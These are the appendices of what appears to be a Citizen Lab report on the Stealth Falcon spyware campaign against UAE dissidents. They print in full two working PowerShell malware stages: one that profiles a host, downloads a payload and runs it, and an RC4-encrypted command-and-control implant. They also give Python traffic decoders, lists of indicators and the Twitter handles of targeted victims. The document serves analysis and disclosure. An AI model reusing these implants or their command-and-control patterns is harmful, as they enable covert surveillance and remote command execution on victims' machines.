
Keep Calm and (Don’t) Enable Macros Appendices

Appendices

See our original report here.

Appendix A: Stage One PowerShell Command

try
{
    $path = "%temp%"
    $url = "http://adhostingcache.com/ehhe/eh4g4/adcache.txt"
    $extension = "ps1"

    $guid = (get-wmiobject win32_computersystemproduct).UUID

    $tmp = get-wmiobject win32_operatingsystem
    $osinfo = "{"
    $osinfo = $osinfo + '"systemdirectory":"'+$tmp.systemdirectory+'",'
    $osinfo = $osinfo + '"buildnumber":"'+$tmp.buildnumber+'",'
    $osinfo = $osinfo + '"registereduser":"'+$tmp.registereduser+'",'
    $osinfo = $osinfo + '"serialnumber":"'+$tmp.serialnumber+'",'
    $osinfo = $osinfo + '"version":"'+$tmp.version+'"'
    $osinfo = $osinfo + "}"

    $tmp = get-wmiobject win32_computersystem
    $sysinfo = "{"
    $sysinfo = $sysinfo + '"manufacturer":"'+$tmp.manufacturer+'",'
    $sysinfo = $sysinfo + '"model":"'+$tmp.model+'",'
    $sysinfo = $sysinfo + '"name":"'+$tmp.name+'",'
    $sysinfo = $sysinfo + '"primaryownername":"'+$tmp.primaryownername+'",'
    $sysinfo = $sysinfo + '"totalphysicalmemory":"'+$tmp.totalphysicalmemory+'"'
    $sysinfo = $sysinfo + "}"

    $dotnet_array = get-childitem 'HKLM:\SOFTWARE\Microsoft\NET Framework Setup\NDP' -recurse | get-itemproperty -name version -EA 0 | where {$_.pschildname -match '^(?!S)\p{L}'}
    for ($i=0; $i -lt $dotnet_array.length; $i++){$dotnet = $dotnet + '"'+$dotnet_array[$i].Version+'",'}
    $dotnet = '[' + $dotnet.substring(0, $dotnet.length-1) + ']'

    $info = '{'
    $info = $info + '"guid":"'+$guid+'",'
    $info = $info + '"osinfo":'+$osinfo+','
    $info = $info + '"sysinfo":'+$sysinfo+','
    $info = $info + '"dotnet":'+$dotnet+''
    $info = $info + '}'
    $info_64 = [system.convert]::tobase64string([system.text.encoding]::unicode.getbytes($info))

    # send, receive
    $client = new-object system.net.webclient
    $data = $client.downloadstring("$url/?info=$info_64")

    if([string]::IsNullOrEmpty($data)){exit}

    # drop
    $abspath = [system.environment]::expandenvironmentvariables($path) + "\$guid.$extension"
    [io.file]::writeallbytes($abspath, [convert]::frombase64string($data))

    # execute
    iex $abspath
} catch {}


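The decoder below is an added example for analysts; it is not code from the original report or from the operator. It reads the Stage One beacon as the script above emits it: a GET to the C2 whose info parameter carries the profile JSON (machine UUID, OS, hardware and .NET versions) encoded as UTF-16LE and then base64, and it recovers that JSON from a URL as a proxy or IDS would log it. The C2 host is the one in the script; the function names, the sample profile values and the sample URLs are constructed for illustration.

```python
"""Decode a Stage One beacon of the form <c2>/?info=<base64> (added example).

The profile is built as JSON, encoded with [system.text.encoding]::unicode
(UTF-16LE, no BOM), base64-encoded and sent as a GET parameter.
"""
import base64
import binascii
import json
from typing import Optional
from urllib.parse import unquote, urlsplit


def extract_info_param(url: str) -> Optional[str]:
    """Return the raw `info` value without the '+' -> ' ' mangling of parse_qs().

    Only percent-decoding is undone, since a proxy may log '/' or '=' as %2F / %3D.
    """
    for pair in urlsplit(url).query.split("&"):
        key, sep, value = pair.partition("=")
        if sep and key == "info":
            return unquote(value)
    return None


def decode_stage_one_beacon(url: str) -> dict:
    """Recover the profile dict; raise ValueError if the URL is not a Stage One beacon."""
    raw = extract_info_param(url)
    if raw is None:
        raise ValueError("no info= parameter in URL")
    # Some log pipelines turn '+' into spaces or drop '=' padding; repair both.
    raw = raw.strip().replace(" ", "+")
    raw += "=" * (-len(raw) % 4)
    try:
        blob = base64.b64decode(raw, validate=True)
    except binascii.Error as exc:
        raise ValueError(f"info is not base64: {exc}") from exc
    # A UTF-8 decode here would yield NUL-interleaved garbage; the blob is UTF-16LE.
    text = blob.decode("utf-16-le")
    try:
        return json.loads(text)
    except json.JSONDecodeError:
        # The implant concatenates values without escaping, so a quote in e.g.
        # the registered-user name yields invalid JSON; keep the raw text instead.
        return {"_raw": text}


def summarize(profile: dict) -> str:
    """One-line triage summary of a decoded profile."""
    os_ = profile.get("osinfo", {})
    sysinfo = profile.get("sysinfo", {})
    return (f"host={sysinfo.get('name')} guid={profile.get('guid')} "
            f"os={os_.get('version')} build={os_.get('buildnumber')} "
            f"dotnet={','.join(profile.get('dotnet', []))}")


# --- builders, used only to fabricate sample input -------------------------------
def encode_info(text: str) -> str:
    """Encode as the implant does: UTF-16LE, then base64."""
    return base64.b64encode(text.encode("utf-16-le")).decode("ascii")


def build_stage_one_url(c2: str, profile: dict) -> str:
    return f"{c2}/?info={encode_info(json.dumps(profile, separators=(',', ':')))}"


# Constructed sample (made-up UUID, hostname and serial number).
SAMPLE_PROFILE = {
    "guid": "4C4C4544-0000-0000-0000-000000000000",
    "osinfo": {"systemdirectory": "C:\\Windows\\system32", "buildnumber": "7601",
               "registereduser": "user", "serialnumber": "00000-000-0000000-00000",
               "version": "6.1.7601"},
    "sysinfo": {"manufacturer": "Example", "model": "Laptop", "name": "WORKSTATION",
                "primaryownername": "user", "totalphysicalmemory": "8589934592"},
    "dotnet": ["2.0.50727.5420", "3.0.30729.5420", "3.5.30729.5420", "4.5.51641"],
}
SAMPLE_URL = build_stage_one_url("http://adhostingcache.com/ehhe/eh4g4/adcache.txt", SAMPLE_PROFILE)
# A profile whose registered user contains a quote, as the unescaped concatenation would emit it.
SAMPLE_UNESCAPED_URL = "http://adhostingcache.com/?info=" + encode_info(
    '{"guid":"x","osinfo":{"registereduser":"o"brien"}}')

if __name__ == "__main__":
    print(summarize(decode_stage_one_beacon(SAMPLE_URL)))
    print(decode_stage_one_beacon(SAMPLE_UNESCAPED_URL))
```

Two details of the script above that the decoder has to respect: [system.text.encoding]::unicode is UTF-16LE, so the blob must not be read as UTF-8, and the base64 is placed in the query string unescaped, so parse_qs() or unquote_plus() would turn its '+' characters into spaces and break decoding. The reply body the script expects is base64 of the next-stage .ps1, which it writes to %temp%\<UUID>.ps1 and runs; that file name is therefore a useful host artefact.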
Appendix B: Stage Two PowerShell Command

$QvF=""
$OCs="9026ef20"
$SLlWfL="RaH80/bk5xhNn4bISBUTPQ=="
$mxExBh="$ENV:Temp\IEWebCache.vbs"
function UwDSkX{
try{add-type $tWRv}catch{}
$script:SLlWfL=[system.convert]::frombase64string($SLlWfL)
$script:QvF=(get-wmiobject win32_computersystemproduct).UUID.substring(0,8)
while($true){
try{
$kcLJjB=tYRy([RC4]::Crypt([system.text.encoding]::utf8.getbytes('&'),$SLlWfL))
if($kcLJjB){
$yDotaj=[RC4]::Crypt($kcLJjB,$SLlWfL)
$yDotaj=[system.text.encoding]::utf8.getstring($yDotaj)
try{
foreach($MpkgwL in $yDotaj -split "&&&"){
$gZb=""
$wQD=$false
$rNlvFz=$MpkgwL -split "&&"
$gZb += "`"ci`":`"$([string]$rNlvFz[0])`""
$gZb += ",`"t`":`"$([string]$rNlvFz[1])`""
switch($rNlvFz[1]){
"9"{
schtasks /end /tn `"IE Web Cache`" | out-null
schtasks /delete /f /tn `"IE Web Cache`" | out-null
remove-item $mxExBh
$gZb += ",`"c`":0"
$wQD=$true
}
default{
$VAMR=[system.text.encoding]::utf8.getstring([system.convert]::frombase64string($rNlvFz[2]))
$WLpyjj=iex($VAMR)
$gZb += ",`"c`":`"$WLpyjj`""
}
}
$Nni=[RC4]::Crypt([system.text.encoding]::utf8.getbytes($gZb),$SLlWfL)
tYRy($Nni)
if($wQD){exit}
}
}catch{
try{
$gZb += ",`"ec`":`"$([string]$lastexitcode)`""
$gZb += ",`"c`":`"$($_.exception.message)`""
tYRy([RC4]::Crypt([system.text.encoding]::utf8.getbytes($gZb), $SLlWfL))
}catch{
}
}
}
}catch{}
Start-Sleep -s 600
}
}
function tYRy($hxWR){
$eVFXy=$null
$HXWL=New-Object -ComObject "Msxml2.ServerXMLHTTP.6.0"
$HXWL.open('POST',"https://incapsulawebcache.com/cache/cache.nfo",$false)
$HXWL.setrequestheader("Content-length",$hxWR.length)
$HXWL.setrequestheader("User-Agent", "Mozilla/5.0 (compatible; MSIE 10.6; Windows NT 6.1; Trident/5.0; InfoPath.2; SLCC1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 2.0.50727)")
$HXWL.setrequestheader("Connection","close")
$HXWL.setoption(2,13056)
$HXWL.send("$OCs$QvF" + [system.convert]::tobase64string($hxWR))
$eVFXy=$HXWL.responsebody
return $eVFXy
}
$tWRv = @"
using System.Text;
public static class RC4{
public static byte[] Crypt(byte[] input, byte[] key){
byte[] inbytes=input;
byte[] result=new byte[inbytes.Length];
int x, y, j=0;
int[] box=new int[256];
for (int i=0; i < 256; i++){box[i]=i;}
for (int i=0; i < 256; i++){
j=((char)key[i % key.Length] + box[i] + j) % 256;
x=box[i];
box[i]=box[j];
box[j]=x;
}
x=0;
y=0;
for(int i = 0; i < inbytes.Length; i++){
x=(x + 1) % 256;
y=(y + box[x]) % 256;
j=box[x];
box[x]=box[y];
box[y]=j;
result[i]=(byte)(inbytes[i] ^ box[(box[x] + box[y]) % 256]);
}
return result;
}
}
"@
try{
$aTKs=new-object -typename system.threading.mutex -argumentlist $false, "Global\YZi"
if($aTKs.waitone(100)){UwDSkX}
}finally{try{$aTKs.releasemutex()}catch{}}


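The following decoder is an added example, not code from the original report or from the operator; it implements the Stage Two envelope as it can be read from the script above. Each message is RC4-encrypted with the static 16-byte key decoded from RaH80/bk5xhNn4bISBUTPQ==, base64-encoded and POSTed as the string 9026ef20 followed by the first eight characters of the machine UUID and the base64 ciphertext. A plaintext of & is the ten-minute check-in. The server's reply body is raw RC4 ciphertext (not base64) whose plaintext is tasks separated by &&&, each ci&&t&&base64(command); t equal to 9 means uninstall, anything else is run through iex. Command output goes back as "ci":..,"t":..,"c":".." (no braces) in the same envelope. The victim id, tasks and output in the sample exchange are constructed, and the function names are assumed for this example.

```python
"""Decoder for the Stage Two C2 envelope of the implant above (added example)."""
import base64
import json
from typing import List, Optional, Tuple

STATIC_PREFIX = "9026ef20"                          # $OCs in the script
KEY = base64.b64decode("RaH80/bk5xhNn4bISBUTPQ==")  # $SLlWfL, 16 bytes
UNINSTALL_TYPE = "9"


def rc4(data: bytes, key: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA); byte-for-byte equivalent to the embedded C# RC4.Crypt."""
    box = list(range(256))
    j = 0
    for i in range(256):
        j = (key[i % len(key)] + box[i] + j) % 256
        box[i], box[j] = box[j], box[i]
    x = y = 0
    out = bytearray()
    for b in data:
        x = (x + 1) % 256
        y = (y + box[x]) % 256
        box[x], box[y] = box[y], box[x]
        out.append(b ^ box[(box[x] + box[y]) % 256])
    return bytes(out)


def parse_beacon_body(body: str) -> Tuple[str, str]:
    """Split an implant POST body into (victim id, plaintext).

    Raises ValueError if the body lacks the static marker; that marker is also the
    cheapest network signature for this family (9026ef20 + 8 hex chars + base64).
    """
    if len(body) < 16 or not body.startswith(STATIC_PREFIX):
        raise ValueError("body does not start with the 9026ef20 marker")
    victim_id = body[8:16]
    plaintext = rc4(base64.b64decode(body[16:]), KEY).decode("utf-8")
    return victim_id, plaintext


def classify_plaintext(plaintext: str) -> str:
    """'checkin' for the bare '&' poll, 'result' for a command reply, else 'unknown'."""
    if plaintext == "&":
        return "checkin"
    if plaintext.startswith('"ci":'):
        return "result"
    return "unknown"


def parse_result(plaintext: str) -> dict:
    """Rebuild the reply as JSON; iex output is interpolated unescaped, so fall back to raw."""
    try:
        return json.loads("{" + plaintext + "}")
    except json.JSONDecodeError:
        return {"_raw": plaintext}


def parse_tasking(server_response: bytes) -> List[dict]:
    """Decrypt a server reply and expand it into the tasks the implant would execute."""
    text = rc4(server_response, KEY).decode("utf-8")
    tasks = []
    for chunk in text.split("&&&"):
        fields = chunk.split("&&")
        ci, ttype = fields[0], fields[1]
        if ttype == UNINSTALL_TYPE:
            # schtasks /delete "IE Web Cache", remove %TEMP%\IEWebCache.vbs, exit
            tasks.append({"ci": ci, "t": ttype, "action": "uninstall"})
        else:
            cmd = base64.b64decode(fields[2]).decode("utf-8")
            tasks.append({"ci": ci, "t": ttype, "command": cmd})
    return tasks


# --- builders, used only to fabricate the sample traffic below -------------------
def build_beacon_body(victim_id: str, plaintext: str) -> str:
    return STATIC_PREFIX + victim_id + base64.b64encode(rc4(plaintext.encode("utf-8"), KEY)).decode("ascii")


def build_tasking(tasks: List[Tuple[str, str, Optional[str]]]) -> bytes:
    chunks = []
    for ci, ttype, cmd in tasks:
        chunk = f"{ci}&&{ttype}"
        if cmd is not None:
            chunk += "&&" + base64.b64encode(cmd.encode("utf-8")).decode("ascii")
        chunks.append(chunk)
    return rc4("&&&".join(chunks).encode("utf-8"), KEY)


# Constructed sample exchange (victim id = first 8 chars of a made-up UUID).
SAMPLE_CHECKIN = build_beacon_body("4C4C4544", "&")
SAMPLE_TASKING = build_tasking([("17", "2", "whoami /all"), ("18", "9", None)])
SAMPLE_RESULT = build_beacon_body("4C4C4544", '"ci":"17","t":"2","c":"WORKSTATION\\\\user"')

if __name__ == "__main__":
    vid, pt = parse_beacon_body(SAMPLE_CHECKIN)
    print(vid, classify_plaintext(pt))
    for task in parse_tasking(SAMPLE_TASKING):
        print(task)
    print(parse_result(parse_beacon_body(SAMPLE_RESULT)[1]))
```

Because the key is static and embedded in the script, any captured exchange can be decrypted offline with it. Two further points visible in the script are worth noting for detection and for anyone replaying traffic: setoption(2,13056) tells ServerXMLHTTP to ignore all server certificate errors, so the C2 does not need a valid certificate, and the Content-length header is set to the length of the raw ciphertext rather than of the encoded body that is actually sent.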
Appendix C: JavaScript Profiling File

Due to its large size, this appendix is available in an external Google Document:
https://docs.google.com/a/citizenlab.ca/document/d/106EQw_SzppLXBKm-bA2F3nTZuQ_z7Lx8EcLigp9UgxE/edit?usp=sharing


Appendix D: Public Stealth Falcon Tweets

Attacker Victim Link
@Bu_saeed2 @Kh_OZ http://twitter.com/Bu_saeed2/status/156781983983349760
@Bu_saeed2 @saalaam25 http://twitter.com/Bu_saeed2/status/158272650995695616
@Bu_saeed2 @alshamsi789 http://twitter.com/Bu_saeed2/status/156785619744473088
@Bu_saeed2 @BdrBakalla http://twitter.com/Bu_saeed2/status/156406670866653184
@Bu_saeed2 @omran83 http://twitter.com/Bu_saeed2/status/158267593269063680
@Bu_saeed2 @abu_sa33d https://twitter.com/Bu_saeed2/status/158269006451707904
@islam_way_2030 @Morsyuae http://twitter.com/islam_way_2030/status/212563401761755137
@islam_way_2030 @WeldBudhabi https://twitter.com/islam_way_2030/status/232392466760863744
@islam_way_2030 @Rmadanhom https://twitter.com/islam_way_2030/status/232392808336588800
@islam_way_2030 @intihakat https://twitter.com/islam_way_2030/status/232393358243401728
@islam_way_2030 @bomsabih https://twitter.com/islam_way_2030/status/232394930285318144
@islam_way_2030 @hwghp https://twitter.com/islam_way_2030/status/232395293449146368
@um_zainab123 @haalreem http://twitter.com/um_zainab123/status/255210220907802624
@um_zainab123 @alsalam45 http://twitter.com/um_zainab123/status/255230862914899969
@1a1_ahmed @magdy_masood1 http://twitter.com/1a1_ahmed/status/367590431762051072
@MiriamKhaled @uaelionheart http://twitter.com/MiriamKhaled/status/156804441436205056
@MiriamKhaled @uaepolitician http://twitter.com/MiriamKhaled/status/156795446910664704
@MiriamKhaled @bosalim77 http://twitter.com/MiriamKhaled/status/156756400108867584
@MiriamKhaled @zayedson7 http://twitter.com/MiriamKhaled/status/156803937482190848
@MiriamKhaled @71uae https://twitter.com/MiriamKhaled/status/156625204280434688
@JJory22 @helalsalem11 https://twitter.com/JJory22/status/159144594574020608
@pooruae @2011national https://twitter.com/pooruae/status/156766408137646080
@pooruae @youae_dxb https://twitter.com/pooruae/status/156766841702854657
@r7aluae2 @newbedon https://twitter.com/r7aluae2/status/156418043424157696

Additional Details

  • @saalaam25 was targeted on 14 January 2012.  The account stopped tweeting on 5 December 2014.  The account tweeted about political issues in the UAE.

  • @alshamsi789 was targeted on 10 January 2012.  The account is still active, and tweets about political issues in the UAE.

  • @BdrBakalla was targeted on 9 January 2012.  The account is still active, and gives its location as “Abu Dhabi.”

  • @morsyuae was targeted on 12 June 2012.  The account is still active, and appears to tweet in solidarity with political prisoners in the UAE.

  • @HaAlReem was targeted on 7 October 2012.  The account stopped tweeting on 17 August 2013.  The account appeared to tweet in solidarity with political prisoners in the UAE.

  • @alsalam45 was targeted on 7 October 2012.  The account stopped tweeting on 13 August 2015.  The account appeared to tweet in solidarity with political prisoners in the UAE.

  • @magdy_masood1 was targeted on 14 August 2013.  The account stopped tweeting on 30 July 2014.  The account appeared to tweet about Gaza, and against Egyptian President Sisi.

  • @UAELionHeart was targeted on 10 January 2012.  The account stopped tweeting on 30 June 2013.  The account appeared to tweet in solidarity with political prisoners in the UAE.

  • @uaepolitician was targeted on 10 January 2012.  The account appears to no longer exist.

  • @bosalim77 was targeted on 10 January 2012.  The account is currently suspended.

  • @ZayedSon7 was targeted on 10 January 2012.  The account appears to no longer exist.

  • @helalsalem11 was targeted on 16 January 2012.  The account is still active, and appears to tweet in solidarity with political prisoners in the UAE.

  • @2011national, now renamed to @2013national, was targeted on 10 January 2012.  The account is still active, and appears to tweet in solidarity with political prisoners in the UAE.

  • @abu_sa33d was targeted on 14 January 2012.  The account is still active, and appears to tweet both Jihadi content, and solidarity with political prisoners in the UAE.

  • @YouAE_Dxb was targeted on 10 January 2012.  The account appears to no longer exist.

  • @hwghp was targeted on 5 August 2012.  The account is still active, and describes itself as “in solidarity with the UAE detainees.”  The account appears to tweet in solidarity with political prisoners in the UAE.

  • @Rmadanhom, now renamed to @Duaamadloom, was targeted on 5 August 2012.  The account is still active, and appears to tweet in solidarity with political prisoners in the UAE.


Appendix E: Results of aax.me Scan

Due to its large size, this appendix is available in an external Google Sheet:

https://docs.google.com/a/citizenlab.ca/spreadsheets/d/1ulfkNzoPCiaVKea9ZOW28V8J8FUXnzWDhBQahj9fUPo/edit?usp=sharing


Appendix F: Indicators of Targeting

Domains (Attack on Donaghy)

aax.me
adhostingcache.com
adhostingcaches.com
incapsulawebcache.com

IPs (Attack on Donaghy)

83.125.20.162
87.120.37.83
95.215.44.37

Stage One C2 Server IP Addresses

103.208.86.23
131.72.136.224
185.62.188.163
185.86.148.245
193.105.134.244
37.59.138.119
45.125.244.196
46.183.221.240
87.121.52.96
91.219.237.142
94.242.202.168
95.183.50.230
95.183.51.164
95.183.51.32

Stage One C2 Server Domains

adlinkmetric.com
adlinkmetrics.com
bestairlinepricetags.com
clickstatistic.com
fasttravelclearance.com
optimizedimghosting.com
rapidlinkhit.com
safeadspace.com
simpleadbanners.com
tinyimagehosting.com
windowshealthcheck.com

Stage Two C2 Server IP Addresses

103.193.4.112
107.181.128.99
151.80.141.155
151.80.158.81
151.80.95.42
158.69.3.165
178.17.170.106
178.17.170.183
178.17.171.104
178.17.171.234
178.17.174.21
185.112.82.4
185.117.73.169
185.141.25.225
185.24.233.110
185.24.233.202
185.24.234.15
185.61.148.176
185.61.148.85
185.61.149.2
185.62.190.127
185.77.129.103
185.86.148.46
185.86.148.55
185.86.149.116
185.99.132.210
188.0.236.83
188.165.80.78
190.10.10.189
190.123.45.141
190.123.45.147
193.105.134.10
193.105.134.13
198.50.177.201
199.201.121.148
200.122.181.117
212.56.214.42
37.59.122.150
37.59.138.117
46.183.219.81
46.183.221.187
46.183.221.230
46.183.221.244
5.149.252.143
5.154.190.120
5.154.190.159
5.9.173.181
78.46.254.161
84.200.16.63
87.120.37.83
87.121.52.95
91.216.245.56
91.236.116.210
91.236.116.44
92.222.66.2
93.174.88.206
94.102.56.140
94.102.56.141
94.23.183.9
94.242.232.13
95.183.50.53
95.183.51.133
95.183.51.21
95.183.53.191
95.215.44.165
95.215.44.2
95.215.44.207

Stage Two C2 Server IP Addresses (Historical)

119.18.57.236
119.18.58.26
124.217.246.199
136.243.250.168
178.17.170.102
178.17.171.173
185.45.192.136
185.62.188.138
185.62.189.16
190.10.9.219
192.71.218.164
198.105.120.51
198.105.122.70
198.105.125.32
199.127.226.243
199.201.121.144
31.220.43.237
46.19.141.188
46.19.143.233
46.28.202.130
46.28.202.93
5.1.88.170
5.196.140.50
5.199.171.40
5.199.171.61
87.117.255.177
87.121.52.170
93.174.88.198
95.183.49.134
95.215.44.251

Stage Two C2 Server Domains

adobereaderupdater.com
airlineadverts.com
akamai-host-network.com
akamai-hosting-network.com
akamaicachecdn.com
akamaicloud.net
akamaicss.com
akamaihostcdn.net
akamaiwebcache.com
appleimagecache.com
burst-media.com
cachecontent.com
cdn-logichosting.com
cdnimagescache.com
chromeupdater.com
cloudburstcdn.net
cloudburstercdn.net
cloudimagecdn.com
cloudimagehosters.com
contenthosts.com
contenthosts.net
dnsclienthelper.com
dnsclientresolver.com
domainimagehost.com
dotnetupdatechecker.com
dotnetupdates.com
dropboxsyncservice.com
edgecacheimagehosting.com
flashplayersupdates.com
flashplayerupdater.com
iesafebrowsingcache.com
iesaferbrowsingcache.com
javaupdatecache.com
javaupdatersvc.com
javaupdatescache.com
javaupdatesvc.com
limelightimagecache.com
livewebcache.com
media-providers.net
mediacachecdn.com
mediacachecdn.net
mediacloudsolution.com
mediacloudsolutions.net
mediaimagecache.com
mediaproviders.net
ministrynewschannel.com
ministrynewsinfo.com
msofficesso.com
msofficeupdates.com
mswindowsupdater.com
netassistcache.com
netcloudcdn.com
optimizercache.com
oraclejavaupdate.com
oraclejavaupdater.com
printspoolerservices.com
safeadvertimgs.com
webanalyticstats.com
wincertificateupdater.com
winconnectors.com
windefenderupdater.com
windowsconnector.com
windowsdefenderupdater.com
windowsearchcache.com
windowspatchmanager.com
windowssearchcache.com
windowsupdatecache.com
windowsupdatescache.com

Related Domains

amnkeysvc.com
amnkeysvcs.com
scheduledupdater.com
yeastarr.com

Suspected Attack Domains

velocityfiles.com
call4uaefreedom.com
uaefreedom.com (on or after October 7, 2012)
a7rarelemarat.com
al7ruae2014.com

Social Media or Email Accounts

the_right_to_fight@openmailbox.org
andrew.dwight389@outlook.com
@a7rarelemarat
@islam_way_2030
@bu_saeed2
@um_zainab123
@1a1_ahmed
@miriamkhaled
@JJory22
@pooruae
@r7aluae2
@Dwight389

Related Social Media Accounts

@al7ruae2014 (Instagram)
@FreeUAE2012


Appendix G: No Evidence of APT28 Connection

Five (or six) of the domains we linked to our operator were registered using anonymousbitcoindomains[.]com (ABCD), a now-defunct “anonymous” registration service that accepted payment in Bitcoin, through which it appears that only about 89 domains were ever registered (all between 2014-07-09 and 2015-04-30).

The service touted the small amount of information collected from its users:

“You don’t need to create an account when you buy a hot dog in the streets, do you? Neither should you when you want to register a domain name. Just like the hot dog sales dude, we validate the money you pay with. And if that’s good, then we’re happy to sell you a domain name!”

There appears to be a belief in the security community that a significant amount of ABCD activity involved the group known as APT28.  APT28 is reported to be supported by the Russian Government,1 and has targeted “NATO, governments of Russia’s neighbors, and U.S. defense contractors”.2  For instance, PwC Threat Intelligence lists one of the domain names we believe is related to our operator, netassistcache.com, as an APT28 domain.  Though the attacks we profile in this report do not appear to align with known APT28 objectives, and the malware sent to Donaghy does not resemble known APT28 malware, we nevertheless feel compelled to examine whether our operator may be related to APT28.  We outline our research below; we find no strong indication that our operator is related to APT28.

A Comparison of Registration Dates

Below, we list the five ABCD domains we linked to our operator, and a sixth ABCD domain that we believe may belong to our operator:

ABCD Domain Registration Date
windowsearchcache.com 2014-11-13
adhostingcache.com 2014-12-01
netassistcache.com 2015-02-25
mediacloudsolution.com 2015-03-05
al7ruae2014.com (possible) 2015-03-05
contenthosts.net 2015-03-08

We noted that several APT28 domains were registered on 2015-03-05, the same day as one of our operator’s domains (and a second domain that may belong to our operator):

al7ruae2014[.]com (possibly our operator)
defencereview[.]net
intelnetservice[.]com (APT28)3
intelsupport[.]net (APT28)4
mediacloudsolution[.]com (our operator)
microsoftdriver[.]com (APT28)5
nato-int[.]com
osce-military[.]org
windowsappstore[.]net (APT28)6

However, there is no further evidence that the APT28 domains are related to our operator’s domains (e.g., there is no overlap in passive DNS).

A “suspension” of ABCD domains

On 2 July 2015, the DNS entries for at least 21 domain names registered via ABCD were updated to IP address 109.71.51.58, according to passive DNS data.  Six of these domain names appear to be directly related to APT28, via public information (microsoftdriver.com and windowsappstore.net appear in an APT28 sample,7 dailyforeignnews.com was documented distributing APT28 malware,8 and diplomatnews.org, worldpoliticsnews.org, and uz-news.org were documented hosting the APT28 exploit kit).9

The Internet Archive records that on 14 July 2015, 12 days after the transfer, microsoftdriver.com returned an apparently nonstandard “Notice: Suspended domain” page.10  We also identified another ABCD domain, bagacamesmo.biz, which was redirected to 109.71.51.58 on 23 September 2014.  Five days later, the Internet Archive records that it displayed a substantially similar notice of domain suspension, except that it attributed the suspension to the “FraudWatch International Security Operations Centre”.11  The reference to FraudWatch appears to be a reference to the eponymous provider of brand-protection services, including website takedown services.12  The Internet Archive records that the suspension message on bagacamesmo.biz was later updated to the same message as the one on microsoftdriver.com.13  The only other instance we found of an ABCD domain whose DNS was changed to 109.71.51.58 was policeoracle.org, which was changed on 18 April 2015.  We note that the “Last-Modified” header for microsoftdriver.com reads 17 April 2015.

Therefore, our hypothesis is that ABCD controls 109.71.51.58.  When they conducted what appears to be their first domain “suspension” (bagacamesmo.biz, perhaps upon request from FraudWatch), they created a custom suspension page indicating this.  Perhaps their second domain “suspension” (policeoracle.org) was on request from a different party, therefore they updated their page to delete the reference to FraudWatch.

One of the at least 21 domain names suspended in this manner on 2 July 2015 was windowsearchcache.com.  However, the domain appears to have been “un-suspended” on 22 July 2015, in that its pre-suspension DNS entry was restored.  It is the only ABCD domain name we were able to identify that was suspended and then un-suspended, and the only suspended ABCD domain name that we were able to trace to our operator.  We are not sure which party requested the suspension, or why ABCD decided to “un-suspend” windowsearchcache.com.

We are unaware of any evidence linking APT28 to windowsearchcache.com.  That windowsearchcache.com appears to be the only un-suspended ABCD domain (and the only one we claim is not APT28’s) suggests that it may be unrelated to APT28 activity.


Footnotes

1. https://www.fireeye.com/blog/threat-research/2014/10/apt28-a-window-into-russias-cyber-espionage-operations.html
2. http://www.wsj.com/articles/hacking-trail-leads-to-russia-experts-say-1414468869
3. https://securelist.com/blog/research/72924/sofacy-apt-hits-high-profile-targets-with-updated-toolset/
4. https://securelist.com/blog/research/72924/sofacy-apt-hits-high-profile-targets-with-updated-toolset/
5. https://www.virustotal.com/en/file/e1259372d15bb5001be18f03dddbdc117710d7a64829dad3a95829413783f0d7/analysis/
6. https://www.virustotal.com/en/file/e1259372d15bb5001be18f03dddbdc117710d7a64829dad3a95829413783f0d7/analysis/
7. https://www.virustotal.com/en/file/e1259372d15bb5001be18f03dddbdc117710d7a64829dad3a95829413783f0d7/analysis/
8. https://labsblog.f-secure.com/2015/09/08/sofacy-recycles-carberp-and-metasploit-code/
9. https://www.nsec.io/wp-content/uploads/2015/05/Northsec_sednit_joan.pdf
10. https://web.archive.org/web/20150714171710/http://www.microsoftdriver.com/
11. https://web.archive.org/web/20140928075555/http://bagacamesmo.biz/
12. http://fraudwatchinternational.com/services/site-take-down/
13. https://web.archive.org/web/20150801004320/http://bagacamesmo.biz/